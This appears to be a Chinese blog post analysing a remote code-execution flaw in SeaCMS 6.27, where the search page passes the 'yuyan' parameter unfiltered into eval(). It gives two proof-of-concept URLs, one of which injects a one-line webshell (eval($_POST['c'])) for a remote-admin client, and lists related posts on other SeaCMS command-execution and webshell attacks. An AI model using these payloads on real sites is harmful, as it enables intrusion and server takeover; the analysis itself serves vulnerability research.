Seacms6.27代码执行分析

最新推荐文章于 2024-02-21 14:08:38 发布
最新推荐文章于 2024-02-21 14:08:38 发布
阅读量282 收藏 1
点赞数
分类专栏: 总结 漏洞挖掘与利用 文章标签: php web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/108344867
版权

分析

首先利用代码审计工具打开网站目录,尝试搜索能够执行代码的函数。首先想到的是eval,实际上该cms的代码执行漏洞正好是eval发起的。
搜索到包含该函数的信息很多,主要关注的是include/main.class.php里的如下区域:
在这里插入图片描述
引用该文件的页面是搜索页面
在这里插入图片描述

在每个 eval() 上面都加一句输出,看看传进来的参数的变化。
在这里插入图片描述
根据输出的结果来看,此处并没有任何过滤,因此接下来的 eval 将会执行代码。

在这里插入图片描述
所以Poc

http://127.0.0.1/search.php?searchtype=5&tid=0&yuyan=代码

菜刀连接的Poc :

http://127.0.0.1/search.php?searchtype=5&tid=0&yuyan=eval($_POST['c'])
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9750
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
[PHP代码审计]SEACMS命令执行漏洞
Y4tacker的博客
05-31 1729
文章目录写在前面漏洞演示漏洞点分析 写在前面 考虑到是后台,且后台目录随机,感觉危害不太大,所以分享思路,这里是防御过度造成的,两个waf的利用导致参数逃逸,希望给大家的审计学习带来帮助 漏洞演示 漏洞点在后台的图片水印设置 在这里我们用burpSuite拦截包,之后我们要修改三个地方,我把参数列出来 ------WebKitFormBoundaryiU3RjTlx8jjXvZLM Content-Disposition: form-data; name="photo_watertext" www.se
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 3092
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
Seacms6.45最新前台getshell漏洞
pygain的博客
02-20 6544
Seacms最新的版本为6.45 更新后的版本存在着一个前台getshell问题
ICHUNQIU TEST 海洋CMS6.26命令执行
sssvvf的博客
10-15 527
网站标题:海洋CMS 在DATA/ADMIN/VER.TXT中查看到海洋CMS的版本 V6.26 https://blog.csdn.net/fsdzsec/article/details/53132362 找到个海洋CMS6.28的命令执行 菜刀链接后在DATA目录下找到数据库配置文件 <?php //鏁版嵁搴撹繛鎺ヤ俊鎭? $cfg_dbhost = '127.0.0.1'; $cfg_...
雷速考核管理系统 v6.27
03-15
雷速考核管理系统 v6.27更新日志: 对前台登录及员工管理进行优化 雷速考核管理系统适用对象:需要为员工提供考核查询的大中型企事业单位、政府机关。软件具有以下特点: 员工只能查询本人的考核结果。 单位管理...
雷速网络考勤系统版本6.27
05-17
摘要:.NET源码,企业建站,考勤,考勤查询,考勤查询系统,考勤管理 不用到考勤机前排队,只需坐到自己电脑前,登录一下网络考勤系统,轻松完成考勤签到签退。本系统可以让员工随时查询本人的考勤记录,实现考勤标准化...
雷速工资查询系统版本6.27
03-17
摘要:.NET源码,企业建站,工资查询,工资查询系统 雷速工资查询系统是一款提供在线员工工资管理的系统软件。  适用对象:  需要为员工提供收入在线查询的大中型企事业单位、政府机关  员工只能查询自己的收入明细...
雷速档案管理系统 版本6.27
03-15
摘要:.NET源码,企业建站,雷速,档案管理系统,档案管理 每个单位都保存着员工的档案信息。员工档案信息涉及多个方面,项目繁多,并且有些项目会经常变化。这给管理工作带来一定的困难。为了高效地对员工档案信息进行...
ros6.27 L6
03-12
MikroTik v6.27 L6许可,可升级至7.x版本。此文件为VMware的导出文件,扩展名为ova,可用VMware Workstation、VMware ESXI或vmware player导入即可。此工具仅限学习使用
海洋cms(海洋影视管理系统) v6.26
12-10
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓
海洋cms(海洋视频内容管理系统) v6.69
10-05
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立
seacms6.53源码
10-11
是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。
海洋cms(海洋影视管理系统) v6.53
11-29
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立
seacms 海洋PHP影视视频网站建站系统 v6.61.rar
07-10
seacms 海洋PHP影视网站建站系统是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能,是一套专为不同需求的站长而设计的视频点播系统。seacms 海洋影视管理系统具有模板众多、插件齐全、资源丰富,构架稳健,平滑升级等诸多优点。支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。   海洋PHP影视网站建站系统2018年5月7日 v6.61功能更新说明:   修复:部分服务器评论乱码问题   修复:默认模板二维码错误(jiathis停止服务)   修复:播放器上方提示无法显示https网址问题   新增:默认模板新增文章搜索页   修复:视频列表标签中顶踩标签不显示的错误   修复:关闭验证码时登陆按钮不显示的错误   优化:海报图片同步功能   还有更多更新说明请参见压缩包内官方文档。
SeaCMS远程命令执行(CNVD-2020-22721)
最新发布
m0_65150886的博客
02-21 408
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
命令执行漏洞--seacms 10.1
m0_62202418的博客
11-26 353
输入IP:127.0.0.1,点击确定,即可提交信息。通过账号密码:admin/admin 进行登录。机会只有一次(如果失败的话,需要重新启动环境)此处需要BurpSuite 进行数据包拦截。找到上传的数据包,发送到Repeater模块。上数据包提交到服务器,Forward提交。访问80端口的映射端口,进入cms。找到 系统--后台IP 安全设置。成功,一句话木马已经传入服务器。在/tmp 文件下找到flag。修改数据包,注入一句话木马。
【CyberSecurityLearning 58】PHP代码注入
_Co1a
04-06 615
目录 PHP 代码注入 原理以及成因 漏洞危害 介绍相关函数和语句 * eval() * assert() * preg_replace() * call_user_func() * 动态函数$a($b) 漏洞利用 * 直接获取Shell * 获取当前文件的绝对路径 * 读文件 * 写文件 防御方法 实战:Seacmsv6.26 命令执行 PHP 代码注入 RCE(remote code execute远程代码执行/注入) 原理以及成因 PHP 代码执行...
记一次海洋cms任意代码执行漏洞拿shell(url一句话)
Sea_Sand息禅
03-06 8700
实验环境:海洋CMS6.54(后续版本已该洞已补) 1、后台登录尝试 这个站点是个测试站,站里没什么数据。 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破。有验证码的也有一个爆破软件,可以识别验证码的,但是试了试用不了。 后天失败。。。 2、网上搜集该CMS的漏洞 刚才也说了,这个站没什么数据,都是空的,无上传点。 百度搜索海洋CMS的漏洞,有好几...
联想VDI 6.27绿色安全办公解决方案详析
确保项目按计划顺利执行。 7. **售后维保** - 方案还包括全面的售后服务,为客户提供技术支持、维护保障,确保方案的长期有效运行。 联想VDI方案建议书V6.27是一份全面且具有竞争力的解决方案,它结合了联想的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值